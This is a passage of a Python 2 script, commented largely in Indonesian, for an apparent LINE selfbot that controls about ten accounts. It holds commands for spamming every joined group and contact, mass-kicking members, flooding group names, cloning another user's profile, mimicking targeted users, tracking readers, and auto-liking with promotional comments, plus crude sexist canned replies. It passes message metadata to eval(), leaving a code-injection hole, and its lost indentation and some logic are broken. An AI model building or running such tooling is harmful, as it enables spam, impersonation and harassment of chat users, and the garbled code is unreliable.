jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
a = k1.getGroupIdsJoined()
a = k2.getGroupIdsJoined()
a = k3.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
k1.sendText(taf, (bctxt))
k2.sendText(taf, (bctxt))
k3.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot pulang"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
#cl.leaveGroup(i)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
kc.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
cl.sendText(msg.to,"★(☆─┅═ই╬BABANG_ADHI☆)(2 s★")
ki.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
kk.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
kc.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
ks.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k1.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k2.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k3.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k4.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k5.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ Team Bonds Kills✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
k1.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
k1.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#----------------------------------------------
elif "copy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Backup","backup"]:
if msg.from_ in admin:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish--------------------#
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in admin:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in admin:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
ki.kickoutFromGroup(msg.to,[mention['M']])
else:
cl.sendText(msg.to, "Khusus Admin")
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
random.choice(KAC).sendText(op.param1)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Kenapa left kak")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
#def autolike():
#for zx in range(0,500):
#hasil = cl.activity(limit=500)
#if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Already Liked"
#time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
#def likePost():
# for zx in range(0,500):
# hasil = cl.activity(limit=500)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
